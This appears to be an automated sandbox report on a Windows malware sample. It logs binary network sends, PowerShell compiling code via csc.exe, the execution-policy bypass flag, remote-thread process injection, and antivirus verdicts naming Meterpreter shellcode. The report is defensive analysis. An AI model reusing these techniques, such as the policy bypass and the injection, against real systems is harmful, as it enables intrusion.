 buffer: 00.c(ªÁZ+¤!t<QóÒí\÷µ”=¶-®Q Ô68}BG°`.R`Κ»¡mð8¦xQ#>·ââ(XéÉ+>øî³Ð ›tƒóà²çÚÈÛZ˧®$å©×ùoíÖS8-ˆ± $O˜’ϯ€ðù‘`Mîù)^¬!'W8WœPʝ}éqcÇ{Í\zpÑ\M4LƒHåM¤%;÷ßʱ¨Üœµ6*;·±m&Må%ß\(Iá¯ù÷ëù0ˆêڙõPó{„lŠÆD:ñݨÅ3¨¸Z¸b9ŠÛm•‹é‹üJAˆ­QUߐÀ>ÛÌ¡*ôDl–£e©'õ`HOÍf5fùãC¶ç&`"§šX‰ÝKñŽõÒ\Ž|@AŠÛ ²@Û­ŒÃuQe
socket: 1292
0 0

WSASend

 buffer: 0*{l"¼%€5=Í¡ QU=•ívlRj½áU‡Ú¸_·KŸÑBZ úºÌ´-d–nh
socket: 1292
0 0

WSASend

 buffer: 0‰ûŽÜ–®0‹²…¥‹zï–6¥-y@x¡µ VA¤Å´mú­1Íºsù“ÄeÎ +bW,i@EaÁހ8± Þä1¬×%6 ¡–A ¼5¸Ùn¬ãFÂZJçY¿ÍX?kVºÎ¤¾´Ü;(çÿ6i‡¼3 1[Œ‹Ü „ÃiÖDuÅ9k¢&™ám¸­ž·ìÅ<J÷ª Nªê=Ï»Þ.Ðá",´?ƒ·ûXG{ÕÙyBphàY£èФPu§3,ägsŸ­‹¹ý<¨—(ú®Z(à¾=“Ô¿}.ƒ9£)tXÊv­Tï‘ òXëôMÅÀ¬l?lÌ$]NšÝ2QAü¥ š7žª™ÐÓHüuðF/ß?G¨i/ÊÝ(hmpˆ`p\
socket: 1292
0 0

WSASend

 buffer: 0+‘*À­Dwó®• 2±¸åo¿ÜkKxéöîT¼»‰“-Kð‰×𝭈AsT³†
socket: 1292
0 0

WSASend

 buffer: 07ԋðÁt½É\OÏ`S@òz•,Ê`eæ~{§Ž14ùùòô«9Glþ¿+ӝ q©Ð pAؐì_¶že`ß#ãe•<ËGŠ .Œ‡B 0Šˆ)—4SÝú¯Wˆ_ÐUÿ›â 7/ü»/¹cž"np–Ö7]k·ˆY/ÁŒü¡0!´ÕkR2r߆™ê¹¸×pá=YùŒXÊâ.{:d@¿áব~¦ºÊð†›©ô§¸/’¤ F±îÔ×h_ñð+˜UQ«å¥íÖ¼°´~8 :§ ‚¦ìǾ/¢xߪôÇÜ·¡fô;Y’ ÉPà9´«`Ð4Tðk¡Ì˜±jE )Éoŵçð³6ԅ3î²â¤|YÜp`šŒ K(X…:Õ|n9\æA‡Ù 
socket: 1292
0 0

WSASend

 buffer: 0—e¬x•¦Û•ÆôL5‚ÞtãTpØÐ÷1æ>fÔZe‰Þ?»þAÿΪèÐê
socket: 1292
0 0

WSASend

 buffer: 0Îè3iµ4· ¼¶A6Çô°)> ×K·‰§‹b“‹ñù$Y2çq`F%›~®ß©§zÖÊx¾“×ð#r¥ ¬n^ÂÒ9½Š±&çè„åþcÒçñyÔs¢è”‡[ÁÊëœ 3Z.½ÊpÁØÁ&G0ÈÔ¯ïSr=}UË3WUW¿ð†KMXAš®É¾‰$'¸L'úD,à\²PG\ÆëézI’¹Ë)csR¹A>J!980v¸q ‡D¢2bO%$/©5õöÄjäDÃÃEf~/ú-:¹¹æUˆx ¢Ô"ù$;_nª*•IO›™|rލõׯUŸ=¼Ÿ›¿SaŸ;# $-àwïW>Õ¶ºs¯Dš£ÒsÃï¼Tw
socket: 1292
0 0

WSASend

 buffer: 0™b¦ëh$,…¯~jaäð@îדyE!@Ëja{w+ÈÿË·àÙZ]'“PáÛÒ
socket: 1292
0 0

WSASend

 buffer: 0M_Ƽ8ºŒŽYñöMßZQÈ€Þî8ïNtßU³Æ¯Tæ¥M" yZ§_—Qœ…Rz·–Ó,Õ AkšnV¹<;Ÿh øÌé0[á¯ÜgGÙèüœäó-¦O²¢—z=-[Øt¶ëv”ìòã0 5qÌC]¨ñ$x âõ…ÇŽY„ì/µöšª85ÒËý%ÇÍù¸t)^$ɳ¤Ÿ‘+Ê«ª {â íuZA¿ƒžãÿÍç±ÓýÓ8fƒÔP˜T /½‚1yÕæÇDñ*h#~nB‰¨ùü”V¶WQ©Ñ&¸ ¾y‚/O/¶é°4p¯¶l®<­TÐ$S†HÕ ìÅCäFŸÒ¬#”ûû°ß–ºÒÞ.†HEm^9Ȏ“•[}×·Ë[)b‚ ØßÐÑ
socket: 1292
0 0

WSASend

 buffer: 04rŠPG/šs‡a\ü5"ìûÏ"#§åseéü¸È{¿¨ ïïF–w{.›új
socket: 1292
0 0

WSASend

 buffer: 0I#u#íÄã E[S-ïtµ*ÌnŽÑ)öÔòïb/"l[úºñuÆ6¶dŠý ƒQ:«»dJ¸1û)ÇñUæ®2>Ê,4¨$21\_+ÉìUv”‡'£ ;Ã]ºíÿmUËòEA۞ù‡×œù*j$Þ;5Jûãi»æCÒPáIµ'՜sϼ¤í„—^¤et£ÆÄ:Ob6«lÕÈßaç$Ø=a6`ƒÒÿ'u *SàbD~H­ã¦À¾©C֍½Ñ±Ä!ΜBN­É„?Qbpp7dWåԘdsè^/E—š¸*IпٚiVD6”ñØ×!è|ÓnÇZú&:ø!T»v¡Ë*5(D[Áu3¬, yóà{Ø»ËöOÙü‡©`éf:¾êjŠxR
socket: 1292
0 0

WSASend

 buffer: 0$ÞŒ¬YV»°v^<ÃɃi‹ºîsِ‘—˜T¼* U*PBFZ\‹=ƒ:
socket: 1292
0 0

WSASend

 buffer: 0EXYÐæ6‘rCáDŽ{`Ñ×é¸Vƒ1,eš¸ô§šÜ3¼­Ý›¢b]¼=–œ`ûü×¾ƒŠ5P)„?᥍Ÿ_°K›—ª¾0Î%f ­ ˆ³-vWføŠNÀšÅ®3adkp>Úêゔ dŒ´ ã®$Öÿï®Å¬ipIÅڅUä,ePÕQ4åÄ-(*=¶œíÑ*nØêÉ èˆ®±ÿçÖd‹6>£(–^«^9^ˆö⑔nŒ:¸ÅóUâ"ë'ƒŒÿ©*&;¢Ó|ѕQJ@ºP±óøô ~xt3£ZƒÞóßlôiŸv ,Ý/4¤ äÁ+[þỀáÒç!ßÔ0`o$(©'î6ÓyY[Å&w^å²n +Õzƒ¼B †ðE‰a¾
socket: 1292
0 0

WSASend

 buffer: 0±(ݺX\þÝéúØÔ{.|#À•B†Ð6˜Y>$ï7ð°%¸|«ïY“
socket: 1292
0 0

WSASend

 buffer: 0Ñ]—ȳKp`‡ ók)0%»û2%wä‹]‰ÞÚÜÞÜÿ ¡ð¦’Õ¯È ÀK±¾,ø=®Nù,媍® H0ÄMÏì3ë…’Œ2õ7ÂèDª©¬|ä[Äo˛G~ˆ­¾S†ëÅ&¢…`E³ÝâañÑÇbgõ}–ÛØÏÁ™ØNV…4lñƒMNxS悉j»‘M½ 13·ÖäðiùôÈI{OÒ³<4Ue¡·¿»‰F³ÈT´-Û2K~QQÛΏYšÁ,]4yæ/¾‘µj^h‘àI»5«î“5js7ރ1ØsÑیêR›Â2v¨™.\{äi†O,|¦ª“A¶So¦ðT¥‘—5îSÉbv4Ê5%÷# @!{UÇJ'BàŽ+àB³Ü'
socket: 1292
0 0

WSASend

 buffer: 0Q+i¤7ëæp>ªîÿ"sJF÷ÜÅÞüÞò½Ûsž&NðÙBaA´5 ñqø«ˆ
socket: 1292
0 0

WSASend

 buffer: 0Uª¹ÕõmÕˆ „bßי0l­¨q[”ð\µÃºl_…4¬Å…¹Î‚n‡«RE+û¾@•ÙÁ"ÁÀxË"ãàaՆNÝ#Ž,öB húžì¥áßeƒ‰†GþI°£‘¶ƒÉYâ~sÚvKÇ¿`4´ÌU)7T¦j_[ÍFïÐÙ(ôŸuué¸ÂFïŏËöÈv&·¬.'F¾Ì“pvàÌ»Î[ !B1°ßúÆ7él$ôB#ªÈnz¥x8¸}QIq¬à0xnX'–ü8ñZeI:ԅ€%Yò¨š6ëiëßMš6üÆ^Ú,®\!9—wN3ƒ°QÞUÑQe³¨p`˜Ñ³ÚNÇׯ[?ëœð÷ŸèäٖP™· ånŽieìG4òžµ%
socket: 1292
0 0

WSASend

 buffer: 0û‘°Fm ÈÔÔiU'6¨â7—žn§ãÎyÎ'KôɔíÙð†îÐHOð‚龌}n³
socket: 1292
0 0

WSASend

 buffer: 0%¯3kƒm¹tÅz8¨Þ^’vþìýи–ªµw­×UÉfeÍ<õ–­[º$z}¿UPÌczOµ'ÿøДíÁ)ìÝ£i5t“Ï0&z\J܁Ü)μÆan°–‘—‘&óä×Ga2y‡°½I7¬·Ò M3ÔþmШ؅b?ùÅA?g៹¶qx½Db¿"#Çýdf0õ¾^§ç–<Úv㜜·ÐÁeÖ»¸‰Ša_d¯§–ºÕÏ ¢nõ-Ž*ó~8 )à£Í†âeR¨Œã°‰³.ë½¥[‚ n(]~m=ê´\ ¬567¥†A¥ç²a3 I·0÷ùf¢bZ4ȉ>ÝÞO…SÿΨPµNoÒ^6]˜- âPÓ½–;K¥ƒcýK,ЇŒ›ˆ“3Íkº
socket: 1292
0 0

WSASend

 buffer: 0ȗPq®ÂR]€Ý½døcJH+¼FÝTè ¹­P’ÂþÝÜR½’V§³Úy
socket: 1292
0 0

WSASend

 buffer: 0ÏK.+ l¢De8…‘ ¥Q_Ò W7¢à.Š\§Œ¶ŠLPœÈTÏ8˜*Ùòùwk*`Ža{Ï8]§êÖ3cø9òî §i¼œÿ´Ð F=5·ì´)«XI'ò¦¹ìƒ;‘ú&¨P·†4.ËÆ6lqVv“ñÑùµ‚z€zÛm:QîsÛ?א‡¤vµ)-0–dî*»üLųÙ© ýÇåMùÈñ²*½Uµ½Óû<:±hì°­$>ß!Îupy>!¨zƕ)vïGó SùÈa˜üÚ4כ–Ô`'ï’!Âd ü=ß<ÐÊ­ÞhàësG`¸d´×}=’Oʎ3¬æ,½}Èë¹ ´7dhDÆs;1D«g^8Ööö Ƃ¶Vgï0ôô
socket: 1292
0 0

WSASend

 buffer: 0ý¸§6†wæ‡oc•–›=“¹Ëóù˜ŸH¦("Ţ厰çw4fÿs© ¥
socket: 1292
0 0

WSASend

 buffer: 0W·ù?®ÛfæQœ'Ž”{¥m‡Wì,•¦YÅ«>Š[£½ úSÌ Ww”£ÅUK ¨t /pöé8 XÃÁŽ¦ÿ”¤ŸÂjÏ>§^³¼S¯³´z2 ®MoM͋{ìÐHAWâÒÄvtnø ~Ù&góžw±†åÁÈ0¼ëÑ*;R Ãbú©Â­²|Ë g:!h<²i›Ód>ïsT°¥m®òü6Þ`K¢ìˆ*Î"&\Ø@Å8å ]"͏F qºf¬=#¸Äè¹À…B«)ëUÝi§Ä¦65Ïf&ÛzÀ!žØéhÜBþø'ZQµŸ{.<ßð&< „0áâ í-îĎü¯‘>¾÷ˆ›à,›Dÿ‘©qZ&z˜y
socket: 1292
0 0

WSASend

 buffer: 0<ŽÿË:0Õ& .ÞEýàb3ã}xŒl¶ã·tkˆÓ»óxÊ ´°1¡=ÇM@s
socket: 1292
0 0

WSASend

 buffer: 0Û¬ûq…-挻®zVbƒ­<נ⇇Fc#é[ýÍKlo1ÿ˜©ƒÄ:M vYìqmíâÔt½“‚gÈã*é%̍ öÞËsG mÿr²"ùµ![BpÓ/ih玀%I‡YBú6véò4õ‹n0Ì' £ øíÜ¢9ÂKŠÞÁ~þ|};«æ=n§-˜ß .3î‡ m †Çc”«G]8#ïN”Í,<>Õéf.bMÇR‰qC<† ép)ȱc>ì¶¶›é—uý°fóÞÆ«¸b‹¥˜ª„­Fh ߕ& Æ? «âb‘»ž jd¡»J„F¨F"lX“Á?l² ˜¶V ª–a]¶ÍÓ¶LÅëÔq%|i´”¢n¾ë'àCÿéÙqœ‘Jrürڝù²
socket: 1292
0 0

WSASend

 buffer: 0…œHµ «>!eNmÉ{­és] 'Çî—Òy{£¥^ï´Bª2e™,H— ¾
socket: 1292
0 0

WSASend

 buffer: 0Vü Û§;¦ðjN÷ªä&õÀ%(ª›>æeÚ%pŠ™ñ/×Nk*\9y"û3ý#ÃD˜É¨öñDLV¡Vèÿjëÿ¯Ì Ö¬cÏ·Ë`ÍRãÈ¥ÅÃ?ãàÃÌS\i.£tèwK4ªs^ÊåÆúÕ $m֌ðK&Y¸q­ ªaIYí—ñ$·Še4jÖqd_]Eu¸bŠ5~LI&j„žôµ[ÊdYÉLm_0ig iqÓI}†<]hǗù²Šî6œýTé†7ôŸO X•~±¶S^¤ËNÀ(Bªzc"š–´š;)R™y.Bærø¡jdRÂü1½Î•Ñ->h;‹ÛGv™ÀCM1ÚÙ ”°i/qf¡OH€ÚþЉb½¥Ø ZÃ!V½Ñ3”«üï
socket: 1292
0 0

WSASend

 buffer: 0ƒ"ÔîE0ēJ„‹zpªóçÃøÑù^;£1+ Oµ6"$U­'¹÷÷¤¬ÍòKÍ
socket: 1292
0 0

WSASend

 buffer: 0#–IÐ%YzÝÌCí™Oe¶“é¼o3aúVñ“"[È|úvsYfÁ‡ã˜‘€êè™ó¹Ö‡ÏÇr£H *0\ä£.-/Ó¨e-'xÿÃļà(R$¿Šd•_Õ=4'L~,Ië<@Š÷Ü«ª¢¼+RÅW¼7ý݈6·é×ùJïxÉf»C~?@´-÷©ØA6É¢\•Õû?p‰šbÙ°NFòžå;r›)à €»—iõõ`ß®7gTl«ÀŒ¥Õ¥s“²H(>v6DƒBòÚÓoE5ŽÜ]ɞڑGBí¦„ëBÝz´ùÙ¥ži©Â·ˆ¢H8û9 …l²|à›âÇÅØ Ö炡5*pVÜâ^@ýÉZ.Õ;<ÖƒG©ÿ¨†´gýë
socket: 1292
0 0

WSASend

 buffer: 0s=ÓæÇ#Õ²*ß»)=#" Äæ£0‡ àégRè£÷þ¾‚0܃É$x³þ²ï
socket: 1292
0 0

WSASend

 buffer: 0‘ñ‚2zïJ¨Wh²5T€»aX ŒjßÎXW‡QPZC ¶+XÙç0êRWÑ(vÕq† ñuµ¨X2WɑÞC>6'4“hŠÙ%0À’”E°\ Kö̓°ò ”C~ô™ÈCÿ»ÑŸeשÀh¼qê`=pª2òfjdŠ¯ÐìK˜€¦è¡Û{˜žÁIbpÈtÙ? ¼LîÓ© …I›[dÄ+[a à’üñÔí"xÞ3§@&cÁÑDŬ)Äð¶:ÏÈw˜Cl°§œK÷y˜Ù’ ׄõ}bUW¶A°ê«Êê¾#ûÒa…NÔÙÍnÀi’CÛ¢×|BËãÅ&6 /ö“{Â2 ­¾øƒñº—¡¹„¿©€sÐ캖ǑºÙÇFªÜš™
socket: 1292
0 0

WSASend

 buffer: 0–úU¦¦PÂWŽWqTô¡û Âıå±s±²Óó¡‰<©²§•ŒG?ôšìŠ
socket: 1292
0 0

WSASend

 buffer: 0̒°<ÐGÄÖì·QF†$ßÐêoO/E'Í·R”W‘D°ŠÂŸ;;gÖû¶2ì³]¤ T”¸Þ0س=Þ×b89RÕ<Žby»\õâìϑÃïª?¸ËO «8‰IÏ@§.C‚쬺¢‚´ç šhHvÃ5O*ÛðŠÁôáo@Uéâ¤3)½®HKk]E4Øz׋¿Ý$-ڗ^1Ȏ†Â–6ßÖHÇ@x™‘ZŽQÝ×Ó¤'Ì ðœ½›´'ßj-ÿRÑ^þÁ§¸Ó%¨¾z²c›´ÚOoÿ(—¬*ç‰v>°È˜@e ߕêµ{Y:Ág Ê@Aj9(R"â^ÇSDÚ­ AÆé`ʐ®ØDAx8›1¨ª(”ŠÔÄPМf¡ðrìB[ÿú
socket: 1292
0 0

WSASend

 buffer: 0½Ðë5Ò¾!z¬½ÁØ7@Á: ƒ$¥j6̨.ŒL”z¨šV5!Á?õ« Òju
socket: 1292
0 0

WSASend

 buffer: 0¢^`¶/áòć€AˆkåIÊË/=¶ú¦]ïìäõä/Ür©2þ´xèdç{ƒõ#Ù‡kêÒdôI´+K¶G'ØùKóU+ë„bCŽx¡n”'áhf:Î_œmyŽÝe”f-o Ýçïè;³ö3χOÀ)›iC–H<DÔ/%4!]D%´l©4­}Ý|ë0zEV¼ÙŠìÊ5¤þÂB—·Šúb.Ÿß›6s²b†FÇTâ°ô%ww>m~݄GFB@¿ÆÓ\kýôcMÚµ7ŸÎ;EÕ©~±k ÂrfâX¸ ü4"”ð“i­S ZkcÐzÞh»9@Ç0:–Þ3"ÏïâŏØY4YUº-¯«Î®¤fÇ|íUîzj¾‘2j
socket: 1292
0 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wb0pvs3w.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\dsbups9j.cmdline"
Process injection Process 2568 resumed a thread in remote process 2680
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000248
suspend_count: 1
process_identifier: 2680
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W64.AIDetectMalware
tehtris Generic.Malware
Cynet Malicious (score: 100)
CAT-QuickHeal cld.trojan.bzc
Skyhigh BehavesLike.Win64.Generic.ch
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.829.1C532416
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_60% (W)
BitDefender Heur.BZC.MNT.Boxter.829.1C532416
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
Arcabit Heur.BZC.MNT.Boxter.829.1C532416
VirIT Trojan.Win32.Dnldr24.BBST
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Generik.KSCCFWO
APEX Malicious
Avast Script:SNH-gen [Trj]
Kaspersky UDS:Trojan.Win64.Badur
Alibaba TrojanSpy:PowerShell/MeterpreterShellCode.4579fc66
MicroWorld-eScan Heur.BZC.MNT.Boxter.829.1C532416
Rising Trojan.Badur!8.308 (CLOUD)
Emsisoft Heur.BZC.MNT.Boxter.829.1C532416 (B)
F-Secure Heuristic.HEUR/AGEN.1339807
DrWeb PowerShell.SpyBot.22
Zillya Trojan.Cometer.Win32.533
McAfeeD ti!6F783FDDC426
Trapmine malicious.high.ml.score
CTX exe.trojan.generic
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Generic.cbdzv
Webroot W32.Trojan.Gen
Google Detected
Avira HEUR/AGEN.1339807
Antiy-AVL Trojan/Win32.SchoolBoy
Kingsoft malware.kb.a.941
Gridinsoft Ransom.Win64.Gandcrab.oa!s1
Microsoft Trojan:Win32/Wacatac.B!ml
GData Heur.BZC.MNT.Boxter.829.1C532416
Varist W64/Kryptik.XI
McAfee Artemis!70DBF2129AD1
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware/Suspicious
Ikarus Trojan-Spy.Agent
TrendMicro-HouseCall TROJ_GEN.R002H09DS25
Yandex Trojan.GenAsa!VpprgU3GNoU
MaxSecure Trojan.Malware.300983.susgen
AVG Script:SNH-gen [Trj]